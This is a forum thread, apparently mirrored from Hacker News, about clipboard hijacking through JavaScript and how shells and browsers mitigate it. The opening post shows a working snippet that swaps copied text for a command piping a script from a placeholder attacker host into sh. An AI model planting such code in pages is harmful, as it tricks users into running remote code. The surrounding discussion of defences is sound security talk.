zlacker

[parent] [thread] 7 comments
1. egbert+(OP)[view] [source] 2023-07-25 10:54:59
Number one reason why I do not turn JavaScript on, and I will definitely block WebIntegrityAPI indefinitely.

Basic malware JavaScript snippet:

    <script>
    document.getElementById('copy').addEventListener('copy', function(e) {
        e.clipboardData.setData('text/plain',
            'curl http://attacker-domain:8000/shell.sh | sh\n');
        e.preventDefault();
    });
    </script>
replies(2): >>wester+Z3 >>jabart+Ul1
2. wester+Z3[view] [source] 2023-07-25 11:29:00
>>egbert+(OP)
This particular attack is actually not a concern if you're using fish (or zsh for that matter I think), as it will not execute pasted content without an additional pressing of the enter key.
replies(2): >>accoun+Kn >>fruitr+Bo3
3. accoun+Kn[view] [source] [discussion] 2023-07-25 13:34:31
>>wester+Z3
It's still a concern because there will be users reflexively pressing enter without checking what they pasted if it's the expected value most of the time.

Meanwhile there is zero benefit for letting websites manipulate the clipboard or intercept basic browser interactions. This might make sense for applications but that's just another argument why those shouldn't be forced into the same browser as websites.

replies(1): >>fruitr+Go3
4. jabart+Ul1[view] [source] 2023-07-25 17:12:37
>>egbert+(OP)
If you are working in a shell like that you should have outbound ports locked down and a list of allowed domains set in your proxy. Add in some antivirus and a password sudo check and there are plenty of ways to catch this.
replies(1): >>egbert+nJ2
5. egbert+nJ2[view] [source] [discussion] 2023-07-25 23:10:39
>>jabart+Ul1
That's why I have a lexical and intermediate representation (IR) code examiner of JavaScript running as an ICAP server capturing all HTTP/HTTPS connections.

No fear, there.

No need for all those other things.

6. fruitr+Bo3[view] [source] [discussion] 2023-07-26 05:45:44
>>wester+Z3
Bash also buffers pasted content.
7. fruitr+Go3[view] [source] [discussion] 2023-07-26 05:47:19
>>accoun+Kn
Yeah, I'm disappointed there's no permission toggle so that I could have JavaScript-based clipboard setting behind a prompt on most websites and have exceptions for others.
replies(1): >>egbert+xGj
8. egbert+xGj[view] [source] [discussion] 2023-07-30 21:28:15
>>fruitr+Go3
Sounds like an enhancement feature request for NoScript or uBlock Origin, no?